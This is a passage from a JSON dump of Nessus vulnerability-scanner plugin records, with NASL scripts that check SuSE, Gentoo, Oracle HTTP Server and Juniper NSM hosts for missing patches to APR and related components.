"title": "SuSE 11.1 Security Update : libapr (SAT Patch Number 4845)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1623", "CVE-2011-0419", "CVE-2011-1928"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:libapr-util1", "p-cpe:/a:novell:suse_linux:11:libapr1", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_LIBAPR-UTIL1-110701.NASL", "href": "https://www.tenable.com/plugins/nessus/55563", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55563);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2010-1623\", \"CVE-2011-0419\", \"CVE-2011-1928\");\n\n script_name(english:\"SuSE 11.1 Security Update : libapr (SAT Patch Number 4845)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the following security issues :\n\n - 650435: remote DoS in APR. (CVE-2010-1623)\n\n - 693778: unconstrained recursion when processing patterns\n (CVE-2011-0419 / CVE-2011-1928)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=650435\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=693778\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1623.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-0419.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1928.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 4845.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libapr-util1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libapr1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"libapr-util1-1.3.4-12.22.21.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"libapr1-1.3.3-11.18.17.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:35", "description": "This update fixes the following security issues :\n\n - 650435: remote DoS in APR. (CVE-2010-1623)\n\n - 693778: unconstrained recursion when processing patterns. (CVE-2011-0419 / CVE-2011-1928)", "cvss3": {}, "published": "2011-07-12T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : libapr (ZYPP Patch Number 7611)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1623", "CVE-2011-0419", "CVE-2011-1928"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_LIBAPR-UTIL1-7611.NASL", "href": "https://www.tenable.com/plugins/nessus/55566", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55566);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2010-1623\", \"CVE-2011-0419\", \"CVE-2011-1928\");\n\n script_name(english:\"SuSE 10 Security Update : libapr (ZYPP Patch Number 7611)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the following security issues :\n\n - 650435: remote DoS in APR. (CVE-2010-1623)\n\n - 693778: unconstrained recursion when processing\n patterns. (CVE-2011-0419 / CVE-2011-1928)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1623.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-0419.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1928.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7611.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/07/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"libapr-util1-1.2.2-13.12.14.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"libapr-util1-devel-1.2.2-13.12.14.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"libapr1-1.2.2-13.10.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"libapr1-devel-1.2.2-13.10.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:19", "description": "This update fixes the following security issues :\n\n - 650435: remote DoS in APR. (CVE-2010-1623)\n\n - 693778: unconstrained recursion when processing patterns (CVE-2011-0419 / CVE-2011-1928)", "cvss3": {}, "published": "2011-07-12T00:00:00", "type": "nessus", "title": "SuSE 11.1 Security Update : libapr (SAT Patch Number 4845)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1623", "CVE-2011-0419", "CVE-2011-1928"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:libapr-util1", "p-cpe:/a:novell:suse_linux:11:libapr1", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_LIBAPR-UTIL1-110706.NASL", "href": "https://www.tenable.com/plugins/nessus/55564", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55564);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2010-1623\", \"CVE-2011-0419\", \"CVE-2011-1928\");\n\n script_name(english:\"SuSE 11.1 Security Update : libapr (SAT Patch Number 4845)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the following security issues :\n\n - 650435: remote DoS in APR. (CVE-2010-1623)\n\n - 693778: unconstrained recursion when processing patterns\n (CVE-2011-0419 / CVE-2011-1928)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=650435\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=693778\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1623.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-0419.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1928.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 4845.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libapr-util1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libapr1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/07/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"libapr-util1-1.3.4-12.22.21.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"libapr1-1.3.3-11.18.17.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"libapr-util1-1.3.4-12.22.21.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"libapr1-1.3.3-11.18.17.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:45", "description": "The remote host is affected by the vulnerability described in GLSA-201405-24 (Apache Portable Runtime, APR Utility Library: Denial of Service)\n\n Multiple vulnerabilities have been discovered in Apache Portable Runtime and APR Utility Library. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could cause a Denial of Service condition.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2014-05-19T00:00:00", "type": "nessus", "title": "GLSA-201405-24 : Apache Portable Runtime, APR Utility Library: Denial of Service", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1623", "CVE-2011-0419", "CVE-2011-1928", "CVE-2012-0840"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:apr", "p-cpe:/a:gentoo:linux:apr-util", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201405-24.NASL", "href": "https://www.tenable.com/plugins/nessus/74066", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201405-24.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74066);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2010-1623\", \"CVE-2011-0419\", \"CVE-2011-1928\", \"CVE-2012-0840\");\n script_bugtraq_id(43673, 47820, 47929, 51917);\n script_xref(name:\"GLSA\", value:\"201405-24\");\n\n script_name(english:\"GLSA-201405-24 : Apache Portable Runtime, APR Utility Library: Denial of Service\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201405-24\n(Apache Portable Runtime, APR Utility Library: Denial of Service)\n\n Multiple vulnerabilities have been discovered in Apache Portable Runtime\n and APR Utility Library. Please review the CVE identifiers referenced\n below for details.\n \nImpact :\n\n A remote attacker could cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201405-24\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Apache Portable Runtime users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-libs/apr-1.4.8-r1'\n All users of the APR Utility Library should upgrade to the latest\n version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-libs/apr-util-1.3.10'\n Packages which depend on these libraries may need to be recompiled.\n Tools such as revdep-rebuild may assist in identifying some of these\n packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:apr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:apr-util\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/10/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-libs/apr\", unaffected:make_list(\"ge 1.4.8-r1\"), vulnerable:make_list(\"lt 1.4.8-r1\"))) flag++;\nif (qpkg_check(package:\"dev-libs/apr-util\", unaffected:make_list(\"ge 1.3.10\"), vulnerable:make_list(\"lt 1.3.10\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Apache Portable Runtime / APR Utility Library\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-26T14:23:11", "description": "According to its banner, the version of Oracle HTTP Server installed on the remote host is potentially affected by multiple vulnerabilities. \n\nNote that Nessus did not verify if patches or workarounds have been applied.", "cvss3": {}, "published": "2013-08-11T00:00:00", "type": "nessus", "title": "Oracle Fusion Middleware Oracle HTTP Server Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-3352", "CVE-2006-5752", "CVE-2007-3847", "CVE-2007-5000", "CVE-2007-6388", "CVE-2008-2364", "CVE-2010-0425", "CVE-2010-0434", "CVE-2010-2068", "CVE-2011-0419", "CVE-2011-3348", "CVE-2012-2687"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:oracle:http_server"], "id": "ORACLE_HTTP_SERVER_CPU_JUL_2013.NASL", "href": "https://www.tenable.com/plugins/nessus/69301", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69301);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\n\n script_cve_id(\n \"CVE-2005-3352\",\n \"CVE-2006-5752\",\n \"CVE-2007-3847\",\n \"CVE-2007-5000\",\n \"CVE-2007-6388\",\n \"CVE-2008-2364\",\n \"CVE-2010-0425\",\n \"CVE-2010-0434\",\n \"CVE-2010-2068\",\n \"CVE-2011-0419\",\n \"CVE-2011-3348\",\n \"CVE-2012-2687\"\n );\n script_bugtraq_id(\n 15834,\n 24645,\n 25489,\n 26838,\n 27237,\n 29653,\n 38494,\n 40827,\n 47820,\n 49616,\n 55131\n );\n script_xref(name:\"CERT\", value:\"280613\");\n\n script_name(english:\"Oracle Fusion Middleware Oracle HTTP Server Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of Oracle HTTP Server\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote web server may be affected by multiple vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its banner, the version of Oracle HTTP Server installed on\nthe remote host is potentially affected by multiple vulnerabilities. \n\nNote that Nessus did not verify if patches or workarounds have been\napplied.\"\n );\n # https://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e1cbd417\");\n # https://support.oracle.com/epmos/faces/DocumentDisplay?_afrLoop=45348489407964&id=1548709.1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2e9008fd\");\n # https://support.oracle.com/epmos/faces/ui/patch/PatchDetail.jspx?patchId=16802903\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2ab0c223\");\n script_set_attribute(attribute:\"solution\", value:\"Apply the July 2013 CPU.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(79, 200, 399);\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/08/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:http_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"oracle_http_server_version.nasl\");\n script_require_keys(\"www/oracle\", \"Settings/PCI_DSS\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\n\n# Only PCI considers this an issue.\nif (!get_kb_item(\"Settings/PCI_DSS\")) audit(AUDIT_PCI);\n\nport = get_http_port(default:80);\n\n# Make sure this is Oracle.\nget_kb_item_or_exit(\"www/\"+port+\"/oracle\");\n\n# Get version information from the KB.\nversion = get_kb_item_or_exit(\"www/oracle/\"+port+\"/version\", exit_code:1);\nsource = get_kb_item_or_exit(\"www/oracle/\"+port+\"/source\", exit_code:1);\n\n# Check if the remote server is affected. There is a patch in the CPU\n# for this version. No other versions can be patched by this CPU.\nif (version != \"10.1.3.5.0\")\naudit(AUDIT_LISTEN_NOT_VULN, \"Oracle Application Server\", port, version);\n\nset_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n';\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:55", "description": "The remote host has one or more instances of NSM (Network and Security Manager) Server running, with version(s) prior to 2012.2R9. It is, therefore, affected by multiple vulnerabilities related to its Java and Apache installations.", "cvss3": {}, "published": "2014-08-22T00:00:00", "type": "nessus", "title": "Juniper NSM < 2012.2R9 Multiple Java and Apache Vulnerabilities (JSA10642)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-3192", "CVE-2011-3368", "CVE-2012-0031", "CVE-2012-0053", "CVE-2012-5081", "CVE-2013-0169", "CVE-2013-0440", "CVE-2013-0443", "CVE-2013-1537", "CVE-2013-2407", "CVE-2013-2451", "CVE-2013-2457", "CVE-2013-2461", "CVE-2013-4002", "CVE-2013-5780", "CVE-2013-5802", "CVE-2013-5803", "CVE-2013-5823", "CVE-2013-5825", "CVE-2013-5830", "CVE-2014-0411", "CVE-2014-0423", "CVE-2014-0453", "CVE-2014-0460"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:juniper:network_and_security_manager"], "id": "JUNIPER_NSM_JSA10642.NASL", "href": "https://www.tenable.com/plugins/nessus/77326", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77326);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2011-0419\",\n \"CVE-2011-3192\",\n \"CVE-2011-3368\",\n \"CVE-2012-0031\",\n \"CVE-2012-0053\",\n \"CVE-2012-5081\",\n \"CVE-2013-0169\",\n \"CVE-2013-0440\",\n \"CVE-2013-0443\",\n \"CVE-2013-1537\",\n \"CVE-2013-2407\",\n \"CVE-2013-2451\",\n \"CVE-2013-2457\",\n \"CVE-2013-2461\",\n \"CVE-2013-4002\",\n \"CVE-2013-5780\",\n \"CVE-2013-5802\",\n \"CVE-2013-5803\",\n \"CVE-2013-5823\",\n \"CVE-2013-5825\",\n \"CVE-2013-5830\",\n \"CVE-2014-0411\",\n \"CVE-2014-0423\",\n \"CVE-2014-0453\",\n \"CVE-2014-0460\"\n );\n script_bugtraq_id(\n 47820,\n 49303,\n 49957,\n 51407,\n 51706,\n 56071,\n 57670,\n 57702,\n 57712,\n 57778,\n 59194,\n 60625,\n 60645,\n 60653,\n 61310,\n 63082,\n 63110,\n 63115,\n 63121,\n 63135,\n 64914,\n 64918,\n 66914,\n 66916\n );\n script_xref(name:\"CERT\", value:\"737740\");\n script_xref(name:\"CERT\", value:\"858729\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"Juniper NSM < 2012.2R9 Multiple Java and Apache Vulnerabilities (JSA10642)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host has one or more instances of NSM (Network and Security\nManager) Server running, with version(s) prior to 2012.2R9. It is,\ntherefore, affected by multiple vulnerabilities related to its Java\nand Apache installations.\");\n # http://www.juniper.net/techpubs/software/management/security-manager/nsm2012_2/nsm2012_2_release_notes.pdf\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6d05776a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10642\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to NSM version 2012.2R9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/05/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:juniper:network_and_security_manager\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"juniper_nsm_gui_svr_detect.nasl\", \"juniper_nsm_servers_installed.nasl\");\n script_require_keys(\"Juniper_NSM_VerDetected\");\n\n 